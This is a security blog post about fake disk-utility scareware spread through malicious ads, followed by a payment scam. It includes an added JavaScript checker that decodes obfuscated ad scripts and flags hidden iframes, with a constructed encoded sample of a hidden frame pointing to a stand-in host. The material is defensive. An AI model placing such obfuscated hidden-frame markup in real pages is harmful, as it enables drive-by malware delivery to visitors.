Beware of the New Fake Hard Disk Utility Scareware


By Dave Michmerhuizen, Security Researcher

Fake Hard Disk Utility scareware is a new type of malware that is trying to one-up the fake anti-spyware scams that have been common for years. While fake anti-spyware tries to convince you that your computer is infected with spyware and malware, Fake Hard Disk Utility scareware tries to convince you that your computer is falling apart. It has appeared under a number of names: HDD Defragmenter, Quick Defragmenter, Win HDD and Win Defrag. The most common variety Barracuda Labs has seen in the wild is named HDD Diagnostic.

This nasty malware attacks a victim's computer using one of the sneakiest tricks in the book – the malicious advertisement, or “malvertisement”. Most Internet ads are included on Web pages via small bits of JavaScript code. The ad is loaded from an ad server elsewhere on the Internet. However, it is becoming more common for these servers to get compromised, and ultimately serve up malicious or suspicious content themselves (see the earlier Barracuda Labs post regarding compromised ads on USAToday.com – http://www.barracudalabs.com/wordpress/index.php/2009/05/07/usatoday-com-ads-redirect-to-rogue-av/).

The attack originated from a legitimate Website that includes advertisements from perconel.com. These ads are added to the Web page using JavaScript which is heavily encoded. In most cases the ad displays fine, but sometimes the ad server includes a little extra JavaScript that causes problems. Ultimately, that encoded JavaScript decodes to this:

The extra JavaScript tells the browser to open a hidden window and access a domain that begins attacking the local computer. A variety of exploits are attempted, resulting in the execution of a downloader which in turn downloads the Fake Hard Disk Utility scareware:
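The pattern described above (an encoded ad script that decodes to markup opening a hidden frame on a domain outside the ad network) is something a Web filter or a site owner can check for statically. The following checker is an added example written for this post, not code from Barracuda Labs or from the original article. It assumes two common string-hiding wrappers, `unescape('%3C...')` and `String.fromCharCode(...)`, peels them off repeatedly, then looks for hidden `<iframe>` tags and compares their hosts against an assumed allow-list of the ad server. The allow-list host and both sample scripts are constructed for illustration.

```javascript
// Added example (not from the original post): a static checker for ad scripts
// that decode to a hidden frame pointing off the ad network.

// Assumed allow-list: the host the ad script is legitimately expected to load from.
const KNOWN_AD_HOSTS = new Set(["ads.adnetwork.test"]);

// Peel one layer of the two string-hiding wrappers this example handles:
// unescape('%3C...') and String.fromCharCode(60, 105, ...). Each call is
// replaced by its decoded text so a later pass can look inside it.
function peelLayer(script) {
  let out = script.replace(/unescape\(\s*(['"])([^'"]*)\1\s*\)/g, (m, q, body) => {
    try { return decodeURIComponent(body); } catch (e) { return m; }
  });
  out = out.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (m, list) =>
    String.fromCharCode(...list.split(",").map(n => parseInt(n.trim(), 10)))
  );
  return out;
}

// Decode repeatedly (bounded) because obfuscated ad scripts often nest layers.
function decodeLayers(script, maxLayers = 5) {
  let current = script;
  for (let i = 0; i < maxLayers; i++) {
    const next = peelLayer(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Hostname of a URL string, or null if it does not parse.
function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Find iframe tags that are visually hidden (zero size, display:none or
// visibility:hidden) and return the hosts they load.
function findHiddenFrames(markup) {
  const hits = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/src\s*=\s*["']?([^"'\s>]+)/i) || [])[1];
    const zeroSize = /\b(width|height)\s*=\s*["']?0(px)?["']?/i.test(attrs);
    const hiddenStyle = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs);
    if (src && (zeroSize || hiddenStyle)) hits.push(hostOf(src));
  }
  return hits.filter(h => h !== null);
}

// Decode the ad script, collect hidden-frame hosts, and flag any host that is
// not the ad server that delivered the script.
function assessAdScript(script) {
  const decoded = decodeLayers(script);
  const hiddenHosts = findHiddenFrames(decoded);
  const offNetwork = hiddenHosts.filter(h => !KNOWN_AD_HOSTS.has(h));
  return { decoded, hiddenHosts, offNetwork, suspicious: offNetwork.length > 0 };
}

// Constructed sample (not a real capture): the frame markup is hidden behind
// an unescape() wrapper and uses a zero-size, visibility:hidden iframe.
const SAMPLE_AD_SCRIPT =
  "document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Flander.example.test%2Fin.php%22" +
  "%20width%3D0%20height%3D0%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));";

// Constructed benign sample: a visible banner from the expected ad host.
const BENIGN_AD_SCRIPT =
  "document.write('<iframe src=\"http://ads.adnetwork.test/banner\" width=300 height=250></iframe>');";

console.log(assessAdScript(SAMPLE_AD_SCRIPT));          // suspicious: true, offNetwork: [ 'lander.example.test' ]
console.log(assessAdScript(BENIGN_AD_SCRIPT).suspicious); // false
```

The check is deliberately narrow: it only reasons about the decoded text and attribute patterns, so it is a triage signal for ad markup rather than a replacement for executing the script in a sandbox. A Web filter would pair it with a domain-reputation lookup on the off-network host it reports.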

We particularly liked the message on this screen – “Hard Drive not found. Missing hard drive.”

The scareware continues to display error messages and block other user programs from running. Occasionally it will reboot the computer and then change the desktop to an ominous black. All of this is to panic the user into clicking on the button to “Enable Defrag HDD Repair.” Doing so brings up the money screen:

The contents of this form are actually from another bogus site named secure.billsecurepay.com. The scammer tries to make the user feel even more “secure” by using the word over and over again. However, the only thing this actually “secures” is a transfer of $80 from the victim to the scammer.

We believe that this new malware is a reaction to the education that has been done regarding fake anti-spyware scareware. As such attacks become common knowledge they lose their effectiveness. This new attack is the same sort of wolf in new clothing, and less likely to be familiar to many computer users. This is yet another reminder to pay attention to your online activities, run a reputable anti-virus solution and filter your Web traffic.

Barracuda Web Filters and the Barracuda Web Filtering Service stop the download of this threat.
